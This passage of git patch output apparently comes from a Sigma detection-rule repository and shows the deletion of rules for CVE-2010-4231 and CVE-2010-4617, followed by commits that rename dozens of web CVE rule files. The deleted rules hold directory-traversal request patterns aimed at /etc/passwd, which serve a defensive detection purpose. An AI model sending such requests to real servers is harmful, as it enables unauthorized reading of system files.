on the camera file system. -references: -- https://nvd.nist.gov/vuln/detail/CVE-2010-4231 -- https://www.exploit-db.com/exploits/15505 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /../../../../../../../../../../../../../etc/passwd - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml deleted file mode 100644 index 9384cf9d..00000000 --- a/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-4617 exploitation attempt -id: cc29de7e-88e9-4deb-ac0b-5072745ba6d5 -author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the JotLoader (com_jotloader) component - 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory - traversal sequences in the section parameter to index.php. -references: -- https://www.exploit-db.com/exploits/15791 -- https://www.cvedetails.com/cve/CVE-2010-4617 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical From 1f7d239bf9ed2f4d7d5314a3587024125b082504 Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Sun, 12 Sep 2021 18:24:35 +0530 Subject: [PATCH 0886/1367] Name change --- ...2010-0943_exploitation_attempt.yaml => web_cve-2010-0943.yaml} | 0 ...2010-0944_exploitation_attempt.yaml => web_cve-2010-0944.yaml} | 0 ...2010-0985_exploitation_attempt.yaml => web_cve-2010-0985.yaml} | 0 ...2010-1219_exploitation_attempt.yaml => web_cve-2010-1219.yaml} | 0 ...2010-1304_exploitation_attempt.yaml => web_cve-2010-1304.yaml} | 0 ...2010-1305_exploitation_attempt.yaml => web_cve-2010-1305.yaml} | 0 ...2010-1306_exploitation_attempt.yaml => web_cve-2010-1306.yaml} | 0 ...2010-1307_exploitation_attempt.yaml => web_cve-2010-1307.yaml} | 0 ...2010-1308_exploitation_attempt.yaml => web_cve-2010-1308.yaml} | 0 ...2010-1312_exploitation_attempt.yaml => web_cve-2010-1312.yaml} | 0 ...2010-1313_exploitation_attempt.yaml => web_cve-2010-1313.yaml} | 0 ...2010-1314_exploitation_attempt.yaml => web_cve-2010-1314.yaml} | 0 ...2010-1345_exploitation_attempt.yaml => web_cve-2010-1345.yaml} | 0 ...2010-1353_exploitation_attempt.yaml => web_cve-2010-1353.yaml} | 0 ...2010-1354_exploitation_attempt.yaml => web_cve-2010-1354.yaml} | 0 ...2010-1470_exploitation_attempt.yaml => web_cve-2010-1470.yaml} | 0 ...2010-1471_exploitation_attempt.yaml => web_cve-2010-1471.yaml} | 0 ...2010-1472_exploitation_attempt.yaml => web_cve-2010-1472.yaml} | 0 ...2010-1473_exploitation_attempt.yaml => web_cve-2010-1473.yaml} | 0 ...2010-1474_exploitation_attempt.yaml => web_cve-2010-1474.yaml} | 0 ...2010-1475_exploitation_attempt.yaml => web_cve-2010-1475.yaml} | 0 ...2010-1476_exploitation_attempt.yaml => web_cve-2010-1476.yaml} | 0 ...2010-1494_exploitation_attempt.yaml => web_cve-2010-1494.yaml} | 0 ...2010-1495_exploitation_attempt.yaml => web_cve-2010-1495.yaml} | 0 ...2010-1532_exploitation_attempt.yaml => web_cve-2010-1532.yaml} | 0 ...2010-1533_exploitation_attempt.yaml => web_cve-2010-1533.yaml} | 0 ...2010-1534_exploitation_attempt.yaml => web_cve-2010-1534.yaml} | 0 ...2010-1535_exploitation_attempt.yaml => web_cve-2010-1535.yaml} | 0 ...2010-1601_exploitation_attempt.yaml => web_cve-2010-1601.yaml} | 0 ...2010-1602_exploitation_attempt.yaml => web_cve-2010-1602.yaml} | 0 ...2010-1607_exploitation_attempt.yaml => web_cve-2010-1607.yaml} | 0 ...2010-1657_exploitation_attempt.yaml => web_cve-2010-1657.yaml} | 0 ...2010-1659_exploitation_attempt.yaml => web_cve-2010-1659.yaml} | 0 ...2010-1714_exploitation_attempt.yaml => web_cve-2010-1714.yaml} | 0 ...2010-1717_exploitation_attempt.yaml => web_cve-2010-1717.yaml} | 0 ...2010-1718_exploitation_attempt.yaml => web_cve-2010-1718.yaml} | 0 ...2010-1719_exploitation_attempt.yaml => web_cve-2010-1719.yaml} | 0 ...2010-1722_exploitation_attempt.yaml => web_cve-2010-1722.yaml} | 0 ...2010-1875_exploitation_attempt.yaml => web_cve-2010-1875.yaml} | 0 ...2010-1953_exploitation_attempt.yaml => web_cve-2010-1953.yaml} | 0 ...2010-1954_exploitation_attempt.yaml => web_cve-2010-1954.yaml} | 0 ...2010-1955_exploitation_attempt.yaml => web_cve-2010-1955.yaml} | 0 ...2010-1956_exploitation_attempt.yaml => web_cve-2010-1956.yaml} | 0 ...2010-1979_exploitation_attempt.yaml => web_cve-2010-1979.yaml} | 0 ...2010-1980_exploitation_attempt.yaml => web_cve-2010-1980.yaml} | 0 ...2010-1981_exploitation_attempt.yaml => web_cve-2010-1981.yaml} | 0 ...2010-1983_exploitation_attempt.yaml => web_cve-2010-1983.yaml} | 0 ...2010-2033_exploitation_attempt.yaml => web_cve-2010-2033.yaml} | 0 ...2010-2034_exploitation_attempt.yaml => web_cve-2010-2034.yaml} | 0 ...2010-2035_exploitation_attempt.yaml => web_cve-2010-2035.yaml} | 0 ...2010-2036_exploitation_attempt.yaml => web_cve-2010-2036.yaml} | 0 ...2010-2122_exploitation_attempt.yaml => web_cve-2010-2122.yaml} | 0 ...2010-2259_exploitation_attempt.yaml => web_cve-2010-2259.yaml} | 0 ...2010-2307_exploitation_attempt.yaml => web_cve-2010-2307.yaml} | 0 ...2010-2682_exploitation_attempt.yaml => web_cve-2010-2682.yaml} | 0 ...2010-2861_exploitation_attempt.yaml => web_cve-2010-2861.yaml} | 0 ...2010-2920_exploitation_attempt.yaml => web_cve-2010-2920.yaml} | 0 ...2010-3426_exploitation_attempt.yaml => web_cve-2010-3426.yaml} | 0 ...2010-4231_exploitation_attempt.yaml => web_cve-2010-4231.yaml} | 0 ...2010-4617_exploitation_attempt.yaml => web_cve-2010-4617.yaml} | 0 ...2010-5278_exploitation_attempt.yaml => web_cve-2010-5278.yaml} | 0 61 files changed, 0 insertions(+), 0 deletions(-) rename rules/web/{web_cve-2010-0943_exploitation_attempt.yaml => web_cve-2010-0943.yaml} (100%) rename rules/web/{web_cve-2010-0944_exploitation_attempt.yaml => web_cve-2010-0944.yaml} (100%) rename rules/web/{web_cve-2010-0985_exploitation_attempt.yaml => web_cve-2010-0985.yaml} (100%) rename rules/web/{web_cve-2010-1219_exploitation_attempt.yaml => web_cve-2010-1219.yaml} (100%) rename rules/web/{web_cve-2010-1304_exploitation_attempt.yaml => web_cve-2010-1304.yaml} (100%) rename rules/web/{web_cve-2010-1305_exploitation_attempt.yaml => web_cve-2010-1305.yaml} (100%) rename rules/web/{web_cve-2010-1306_exploitation_attempt.yaml => web_cve-2010-1306.yaml} (100%) rename rules/web/{web_cve-2010-1307_exploitation_attempt.yaml => web_cve-2010-1307.yaml} (100%) rename rules/web/{web_cve-2010-1308_exploitation_attempt.yaml => web_cve-2010-1308.yaml} (100%) rename rules/web/{web_cve-2010-1312_exploitation_attempt.yaml => web_cve-2010-1312.yaml} (100%) rename rules/web/{web_cve-2010-1313_exploitation_attempt.yaml => web_cve-2010-1313.yaml} (100%) rename rules/web/{web_cve-2010-1314_exploitation_attempt.yaml => web_cve-2010-1314.yaml} (100%) rename rules/web/{web_cve-2010-1345_exploitation_attempt.yaml => web_cve-2010-1345.yaml} (100%) rename rules/web/{web_cve-2010-1353_exploitation_attempt.yaml => web_cve-2010-1353.yaml} (100%) rename rules/web/{web_cve-2010-1354_exploitation_attempt.yaml => web_cve-2010-1354.yaml} (100%) rename rules/web/{web_cve-2010-1470_exploitation_attempt.yaml => web_cve-2010-1470.yaml} (100%) rename rules/web/{web_cve-2010-1471_exploitation_attempt.yaml => web_cve-2010-1471.yaml} (100%) rename rules/web/{web_cve-2010-1472_exploitation_attempt.yaml => web_cve-2010-1472.yaml} (100%) rename rules/web/{web_cve-2010-1473_exploitation_attempt.yaml => web_cve-2010-1473.yaml} (100%) rename rules/web/{web_cve-2010-1474_exploitation_attempt.yaml => web_cve-2010-1474.yaml} (100%) rename rules/web/{web_cve-2010-1475_exploitation_attempt.yaml => web_cve-2010-1475.yaml} (100%) rename rules/web/{web_cve-2010-1476_exploitation_attempt.yaml => web_cve-2010-1476.yaml} (100%) rename rules/web/{web_cve-2010-1494_exploitation_attempt.yaml => web_cve-2010-1494.yaml} (100%) rename rules/web/{web_cve-2010-1495_exploitation_attempt.yaml => web_cve-2010-1495.yaml} (100%) rename rules/web/{web_cve-2010-1532_exploitation_attempt.yaml => web_cve-2010-1532.yaml} (100%) rename rules/web/{web_cve-2010-1533_exploitation_attempt.yaml => web_cve-2010-1533.yaml} (100%) rename rules/web/{web_cve-2010-1534_exploitation_attempt.yaml => web_cve-2010-1534.yaml} (100%) rename rules/web/{web_cve-2010-1535_exploitation_attempt.yaml => web_cve-2010-1535.yaml} (100%) rename rules/web/{web_cve-2010-1601_exploitation_attempt.yaml => web_cve-2010-1601.yaml} (100%) rename rules/web/{web_cve-2010-1602_exploitation_attempt.yaml => web_cve-2010-1602.yaml} (100%) rename rules/web/{web_cve-2010-1607_exploitation_attempt.yaml => web_cve-2010-1607.yaml} (100%) rename rules/web/{web_cve-2010-1657_exploitation_attempt.yaml => web_cve-2010-1657.yaml} (100%) rename rules/web/{web_cve-2010-1659_exploitation_attempt.yaml => web_cve-2010-1659.yaml} (100%) rename rules/web/{web_cve-2010-1714_exploitation_attempt.yaml => web_cve-2010-1714.yaml} (100%) rename rules/web/{web_cve-2010-1717_exploitation_attempt.yaml => web_cve-2010-1717.yaml} (100%) rename rules/web/{web_cve-2010-1718_exploitation_attempt.yaml => web_cve-2010-1718.yaml} (100%) rename rules/web/{web_cve-2010-1719_exploitation_attempt.yaml => web_cve-2010-1719.yaml} (100%) rename rules/web/{web_cve-2010-1722_exploitation_attempt.yaml => web_cve-2010-1722.yaml} (100%) rename rules/web/{web_cve-2010-1875_exploitation_attempt.yaml => web_cve-2010-1875.yaml} (100%) rename rules/web/{web_cve-2010-1953_exploitation_attempt.yaml => web_cve-2010-1953.yaml} (100%) rename rules/web/{web_cve-2010-1954_exploitation_attempt.yaml => web_cve-2010-1954.yaml} (100%) rename rules/web/{web_cve-2010-1955_exploitation_attempt.yaml => web_cve-2010-1955.yaml} (100%) rename rules/web/{web_cve-2010-1956_exploitation_attempt.yaml => web_cve-2010-1956.yaml} (100%) rename rules/web/{web_cve-2010-1979_exploitation_attempt.yaml => web_cve-2010-1979.yaml} (100%) rename rules/web/{web_cve-2010-1980_exploitation_attempt.yaml => web_cve-2010-1980.yaml} (100%) rename rules/web/{web_cve-2010-1981_exploitation_attempt.yaml => web_cve-2010-1981.yaml} (100%) rename rules/web/{web_cve-2010-1983_exploitation_attempt.yaml => web_cve-2010-1983.yaml} (100%) rename rules/web/{web_cve-2010-2033_exploitation_attempt.yaml => web_cve-2010-2033.yaml} (100%) rename rules/web/{web_cve-2010-2034_exploitation_attempt.yaml => web_cve-2010-2034.yaml} (100%) rename rules/web/{web_cve-2010-2035_exploitation_attempt.yaml => web_cve-2010-2035.yaml} (100%) rename rules/web/{web_cve-2010-2036_exploitation_attempt.yaml => web_cve-2010-2036.yaml} (100%) rename rules/web/{web_cve-2010-2122_exploitation_attempt.yaml => web_cve-2010-2122.yaml} (100%) rename rules/web/{web_cve-2010-2259_exploitation_attempt.yaml => web_cve-2010-2259.yaml} (100%) rename rules/web/{web_cve-2010-2307_exploitation_attempt.yaml => web_cve-2010-2307.yaml} (100%) rename rules/web/{web_cve-2010-2682_exploitation_attempt.yaml => web_cve-2010-2682.yaml} (100%) rename rules/web/{web_cve-2010-2861_exploitation_attempt.yaml => web_cve-2010-2861.yaml} (100%) rename rules/web/{web_cve-2010-2920_exploitation_attempt.yaml => web_cve-2010-2920.yaml} (100%) rename rules/web/{web_cve-2010-3426_exploitation_attempt.yaml => web_cve-2010-3426.yaml} (100%) rename rules/web/{web_cve-2010-4231_exploitation_attempt.yaml => web_cve-2010-4231.yaml} (100%) rename rules/web/{web_cve-2010-4617_exploitation_attempt.yaml => web_cve-2010-4617.yaml} (100%) rename rules/web/{web_cve-2010-5278_exploitation_attempt.yaml => web_cve-2010-5278.yaml} (100%) diff --git a/rules/web/web_cve-2010-0943_exploitation_attempt.yaml b/rules/web/web_cve-2010-0943.yaml similarity index 100% rename from rules/web/web_cve-2010-0943_exploitation_attempt.yaml rename to rules/web/web_cve-2010-0943.yaml diff --git a/rules/web/web_cve-2010-0944_exploitation_attempt.yaml b/rules/web/web_cve-2010-0944.yaml similarity index 100% rename from rules/web/web_cve-2010-0944_exploitation_attempt.yaml rename to rules/web/web_cve-2010-0944.yaml diff --git a/rules/web/web_cve-2010-0985_exploitation_attempt.yaml b/rules/web/web_cve-2010-0985.yaml similarity index 100% rename from rules/web/web_cve-2010-0985_exploitation_attempt.yaml rename to rules/web/web_cve-2010-0985.yaml diff --git a/rules/web/web_cve-2010-1219_exploitation_attempt.yaml b/rules/web/web_cve-2010-1219.yaml similarity index 100% rename from rules/web/web_cve-2010-1219_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1219.yaml diff --git a/rules/web/web_cve-2010-1304_exploitation_attempt.yaml b/rules/web/web_cve-2010-1304.yaml similarity index 100% rename from rules/web/web_cve-2010-1304_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1304.yaml diff --git a/rules/web/web_cve-2010-1305_exploitation_attempt.yaml b/rules/web/web_cve-2010-1305.yaml similarity index 100% rename from rules/web/web_cve-2010-1305_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1305.yaml diff --git a/rules/web/web_cve-2010-1306_exploitation_attempt.yaml b/rules/web/web_cve-2010-1306.yaml similarity index 100% rename from rules/web/web_cve-2010-1306_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1306.yaml diff --git a/rules/web/web_cve-2010-1307_exploitation_attempt.yaml b/rules/web/web_cve-2010-1307.yaml similarity index 100% rename from rules/web/web_cve-2010-1307_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1307.yaml diff --git a/rules/web/web_cve-2010-1308_exploitation_attempt.yaml b/rules/web/web_cve-2010-1308.yaml similarity index 100% rename from rules/web/web_cve-2010-1308_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1308.yaml diff --git a/rules/web/web_cve-2010-1312_exploitation_attempt.yaml b/rules/web/web_cve-2010-1312.yaml similarity index 100% rename from rules/web/web_cve-2010-1312_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1312.yaml diff --git a/rules/web/web_cve-2010-1313_exploitation_attempt.yaml b/rules/web/web_cve-2010-1313.yaml similarity index 100% rename from rules/web/web_cve-2010-1313_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1313.yaml diff --git a/rules/web/web_cve-2010-1314_exploitation_attempt.yaml b/rules/web/web_cve-2010-1314.yaml similarity index 100% rename from rules/web/web_cve-2010-1314_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1314.yaml diff --git a/rules/web/web_cve-2010-1345_exploitation_attempt.yaml b/rules/web/web_cve-2010-1345.yaml similarity index 100% rename from rules/web/web_cve-2010-1345_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1345.yaml diff --git a/rules/web/web_cve-2010-1353_exploitation_attempt.yaml b/rules/web/web_cve-2010-1353.yaml similarity index 100% rename from rules/web/web_cve-2010-1353_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1353.yaml diff --git a/rules/web/web_cve-2010-1354_exploitation_attempt.yaml b/rules/web/web_cve-2010-1354.yaml similarity index 100% rename from rules/web/web_cve-2010-1354_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1354.yaml diff --git a/rules/web/web_cve-2010-1470_exploitation_attempt.yaml b/rules/web/web_cve-2010-1470.yaml similarity index 100% rename from rules/web/web_cve-2010-1470_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1470.yaml diff --git a/rules/web/web_cve-2010-1471_exploitation_attempt.yaml b/rules/web/web_cve-2010-1471.yaml similarity index 100% rename from rules/web/web_cve-2010-1471_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1471.yaml diff --git a/rules/web/web_cve-2010-1472_exploitation_attempt.yaml b/rules/web/web_cve-2010-1472.yaml similarity index 100% rename from rules/web/web_cve-2010-1472_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1472.yaml diff --git a/rules/web/web_cve-2010-1473_exploitation_attempt.yaml b/rules/web/web_cve-2010-1473.yaml similarity index 100% rename from rules/web/web_cve-2010-1473_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1473.yaml diff --git a/rules/web/web_cve-2010-1474_exploitation_attempt.yaml b/rules/web/web_cve-2010-1474.yaml similarity index 100% rename from rules/web/web_cve-2010-1474_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1474.yaml diff --git a/rules/web/web_cve-2010-1475_exploitation_attempt.yaml b/rules/web/web_cve-2010-1475.yaml similarity index 100% rename from rules/web/web_cve-2010-1475_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1475.yaml diff --git a/rules/web/web_cve-2010-1476_exploitation_attempt.yaml b/rules/web/web_cve-2010-1476.yaml similarity index 100% rename from rules/web/web_cve-2010-1476_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1476.yaml diff --git a/rules/web/web_cve-2010-1494_exploitation_attempt.yaml b/rules/web/web_cve-2010-1494.yaml similarity index 100% rename from rules/web/web_cve-2010-1494_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1494.yaml diff --git a/rules/web/web_cve-2010-1495_exploitation_attempt.yaml b/rules/web/web_cve-2010-1495.yaml similarity index 100% rename from rules/web/web_cve-2010-1495_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1495.yaml diff --git a/rules/web/web_cve-2010-1532_exploitation_attempt.yaml b/rules/web/web_cve-2010-1532.yaml similarity index 100% rename from rules/web/web_cve-2010-1532_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1532.yaml diff --git a/rules/web/web_cve-2010-1533_exploitation_attempt.yaml b/rules/web/web_cve-2010-1533.yaml similarity index 100% rename from rules/web/web_cve-2010-1533_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1533.yaml diff --git a/rules/web/web_cve-2010-1534_exploitation_attempt.yaml b/rules/web/web_cve-2010-1534.yaml similarity index 100% rename from rules/web/web_cve-2010-1534_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1534.yaml diff --git a/rules/web/web_cve-2010-1535_exploitation_attempt.yaml b/rules/web/web_cve-2010-1535.yaml similarity index 100% rename from rules/web/web_cve-2010-1535_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1535.yaml diff --git a/rules/web/web_cve-2010-1601_exploitation_attempt.yaml b/rules/web/web_cve-2010-1601.yaml similarity index 100% rename from rules/web/web_cve-2010-1601_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1601.yaml diff --git a/rules/web/web_cve-2010-1602_exploitation_attempt.yaml b/rules/web/web_cve-2010-1602.yaml similarity index 100% rename from rules/web/web_cve-2010-1602_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1602.yaml diff --git a/rules/web/web_cve-2010-1607_exploitation_attempt.yaml b/rules/web/web_cve-2010-1607.yaml similarity index 100% rename from rules/web/web_cve-2010-1607_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1607.yaml diff --git a/rules/web/web_cve-2010-1657_exploitation_attempt.yaml b/rules/web/web_cve-2010-1657.yaml similarity index 100% rename from rules/web/web_cve-2010-1657_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1657.yaml diff --git a/rules/web/web_cve-2010-1659_exploitation_attempt.yaml b/rules/web/web_cve-2010-1659.yaml similarity index 100% rename from rules/web/web_cve-2010-1659_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1659.yaml diff --git a/rules/web/web_cve-2010-1714_exploitation_attempt.yaml b/rules/web/web_cve-2010-1714.yaml similarity index 100% rename from rules/web/web_cve-2010-1714_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1714.yaml diff --git a/rules/web/web_cve-2010-1717_exploitation_attempt.yaml b/rules/web/web_cve-2010-1717.yaml similarity index 100% rename from rules/web/web_cve-2010-1717_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1717.yaml diff --git a/rules/web/web_cve-2010-1718_exploitation_attempt.yaml b/rules/web/web_cve-2010-1718.yaml similarity index 100% rename from rules/web/web_cve-2010-1718_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1718.yaml diff --git a/rules/web/web_cve-2010-1719_exploitation_attempt.yaml b/rules/web/web_cve-2010-1719.yaml similarity index 100% rename from rules/web/web_cve-2010-1719_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1719.yaml diff --git a/rules/web/web_cve-2010-1722_exploitation_attempt.yaml b/rules/web/web_cve-2010-1722.yaml similarity index 100% rename from rules/web/web_cve-2010-1722_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1722.yaml diff --git a/rules/web/web_cve-2010-1875_exploitation_attempt.yaml b/rules/web/web_cve-2010-1875.yaml similarity index 100% rename from rules/web/web_cve-2010-1875_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1875.yaml diff --git a/rules/web/web_cve-2010-1953_exploitation_attempt.yaml b/rules/web/web_cve-2010-1953.yaml similarity index 100% rename from rules/web/web_cve-2010-1953_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1953.yaml diff --git a/rules/web/web_cve-2010-1954_exploitation_attempt.yaml b/rules/web/web_cve-2010-1954.yaml similarity index 100% rename from rules/web/web_cve-2010-1954_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1954.yaml diff --git a/rules/web/web_cve-2010-1955_exploitation_attempt.yaml b/rules/web/web_cve-2010-1955.yaml similarity index 100% rename from rules/web/web_cve-2010-1955_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1955.yaml diff --git a/rules/web/web_cve-2010-1956_exploitation_attempt.yaml b/rules/web/web_cve-2010-1956.yaml similarity index 100% rename from rules/web/web_cve-2010-1956_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1956.yaml diff --git a/rules/web/web_cve-2010-1979_exploitation_attempt.yaml b/rules/web/web_cve-2010-1979.yaml similarity index 100% rename from rules/web/web_cve-2010-1979_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1979.yaml diff --git a/rules/web/web_cve-2010-1980_exploitation_attempt.yaml b/rules/web/web_cve-2010-1980.yaml similarity index 100% rename from rules/web/web_cve-2010-1980_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1980.yaml diff --git a/rules/web/web_cve-2010-1981_exploitation_attempt.yaml b/rules/web/web_cve-2010-1981.yaml similarity index 100% rename from rules/web/web_cve-2010-1981_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1981.yaml diff --git a/rules/web/web_cve-2010-1983_exploitation_attempt.yaml b/rules/web/web_cve-2010-1983.yaml similarity index 100% rename from rules/web/web_cve-2010-1983_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1983.yaml diff --git a/rules/web/web_cve-2010-2033_exploitation_attempt.yaml b/rules/web/web_cve-2010-2033.yaml similarity index 100% rename from rules/web/web_cve-2010-2033_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2033.yaml diff --git a/rules/web/web_cve-2010-2034_exploitation_attempt.yaml b/rules/web/web_cve-2010-2034.yaml similarity index 100% rename from rules/web/web_cve-2010-2034_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2034.yaml diff --git a/rules/web/web_cve-2010-2035_exploitation_attempt.yaml b/rules/web/web_cve-2010-2035.yaml similarity index 100% rename from rules/web/web_cve-2010-2035_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2035.yaml diff --git a/rules/web/web_cve-2010-2036_exploitation_attempt.yaml b/rules/web/web_cve-2010-2036.yaml similarity index 100% rename from rules/web/web_cve-2010-2036_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2036.yaml diff --git a/rules/web/web_cve-2010-2122_exploitation_attempt.yaml b/rules/web/web_cve-2010-2122.yaml similarity index 100% rename from rules/web/web_cve-2010-2122_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2122.yaml diff --git a/rules/web/web_cve-2010-2259_exploitation_attempt.yaml b/rules/web/web_cve-2010-2259.yaml similarity index 100% rename from rules/web/web_cve-2010-2259_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2259.yaml diff --git a/rules/web/web_cve-2010-2307_exploitation_attempt.yaml b/rules/web/web_cve-2010-2307.yaml similarity index 100% rename from rules/web/web_cve-2010-2307_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2307.yaml diff --git a/rules/web/web_cve-2010-2682_exploitation_attempt.yaml b/rules/web/web_cve-2010-2682.yaml similarity index 100% rename from rules/web/web_cve-2010-2682_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2682.yaml diff --git a/rules/web/web_cve-2010-2861_exploitation_attempt.yaml b/rules/web/web_cve-2010-2861.yaml similarity index 100% rename from rules/web/web_cve-2010-2861_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2861.yaml diff --git a/rules/web/web_cve-2010-2920_exploitation_attempt.yaml b/rules/web/web_cve-2010-2920.yaml similarity index 100% rename from rules/web/web_cve-2010-2920_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2920.yaml diff --git a/rules/web/web_cve-2010-3426_exploitation_attempt.yaml b/rules/web/web_cve-2010-3426.yaml similarity index 100% rename from rules/web/web_cve-2010-3426_exploitation_attempt.yaml rename to rules/web/web_cve-2010-3426.yaml diff --git a/rules/web/web_cve-2010-4231_exploitation_attempt.yaml b/rules/web/web_cve-2010-4231.yaml similarity index 100% rename from rules/web/web_cve-2010-4231_exploitation_attempt.yaml rename to rules/web/web_cve-2010-4231.yaml diff --git a/rules/web/web_cve-2010-4617_exploitation_attempt.yaml b/rules/web/web_cve-2010-4617.yaml similarity index 100% rename from rules/web/web_cve-2010-4617_exploitation_attempt.yaml rename to rules/web/web_cve-2010-4617.yaml diff --git a/rules/web/web_cve-2010-5278_exploitation_attempt.yaml b/rules/web/web_cve-2010-5278.yaml similarity index 100% rename from rules/web/web_cve-2010-5278_exploitation_attempt.yaml rename to rules/web/web_cve-2010-5278.yaml From 5d654c45187baefe4d0cb5f70400b6c2835dac76 Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Sun, 12 Sep 2021 18:36:20 +0530 Subject: [PATCH 0887/1367] Changing title to camelcase --- ...-0943.yaml => web_cve-2010-0943_exploitation_attempt.yaml} | 4 ++-- ...-0944.yaml => web_cve-2010-0944_exploitation_attempt.yaml} | 4 ++-- ...-0985.yaml => web_cve-2010-0985_exploitation_attempt.yaml} | 4 ++-- ...-1219.yaml => web_cve-2010-1219_exploitation_attempt.yaml} | 4 ++-- ...-1304.yaml => web_cve-2010-1304_exploitation_attempt.yaml} | 4 ++-- ...-1305.yaml => web_cve-2010-1305_exploitation_attempt.yaml} | 4 ++-- ...-1306.yaml => web_cve-2010-1306_exploitation_attempt.yaml} | 4 ++-- ...-1307.yaml => web_cve-2010-1307_exploitation_attempt.yaml} | 4 ++-- ...-1308.yaml => web_cve-2010-1308_exploitation_attempt.yaml} | 4 ++-- ...-1312.yaml => web_cve-2010-1312_exploitation_attempt.yaml} | 4 ++-- ...-1313.yaml => web_cve-2010-1313_exploitation_attempt.yaml} | 4 ++-- ...-1314.yaml => web_cve-2010-1314_exploitation_attempt.yaml} | 4 ++-- ...-1345.yaml => web_cve-2010-1345_exploitation_attempt.yaml} | 4 ++-- ...-1353.yaml => web_cve-2010-1353_exploitation_attempt.yaml} | 4 ++-- ...-1354.yaml => web_cve-2010-1354_exploitation_attempt.yaml} | 4 ++-- ...-1470.yaml => web_cve-2010-1470_exploitation_attempt.yaml} | 4 ++-- ...-1471.yaml => web_cve-2010-1471_exploitation_attempt.yaml} | 4 ++-- ...-1472.yaml => web_cve-2010-1472_exploitation_attempt.yaml} | 4 ++-- ...-1473.yaml => web_cve-2010-1473_exploitation_attempt.yaml} | 4 ++-- ...-1474.yaml => web_cve-2010-1474_exploitation_attempt.yaml} | 4 ++-- ...-1475.yaml => web_cve-2010-1475_exploitation_attempt.yaml} | 4 ++-- ...-1476.yaml => web_cve-2010-1476_exploitation_attempt.yaml} | 4 ++-- ...-1494.yaml => web_cve-2010-1494_exploitation_attempt.yaml} | 4 ++-- ...-1495.yaml => web_cve-2010-1495_exploitation_attempt.yaml} | 4 ++-- ...-1532.yaml => web_cve-2010-1532_exploitation_attempt.yaml} | 4 ++-- ...-1533.yaml => web_cve-2010-1533_exploitation_attempt.yaml} | 4 ++-- ...-1534.yaml => web_cve-2010-1534_exploitation_attempt.yaml} | 4 ++-- ...-1535.yaml => web_cve-2010-1535_exploitation_attempt.yaml} | 4 ++-- ...-1601.yaml => web_cve-2010-1601_exploitation_attempt.yaml} | 4 ++-- ...-1602.yaml => web_cve-2010-1602_exploitation_attempt.yaml} | 4 ++-- ...-1607.yaml => web_cve-2010-1607_exploitation_attempt.yaml} | 4 ++-- ...-1657.yaml => web_cve-2010-1657_exploitation_attempt.yaml} | 4 ++-- ...-1659.yaml => web_cve-2010-1659_exploitation_attempt.yaml} | 4 ++-- ...-1714.yaml => web_cve-2010-1714_exploitation_attempt.yaml} | 4 ++-- ...-1717.yaml => web_cve-2010-1717_exploitation_attempt.yaml} | 4 ++-- 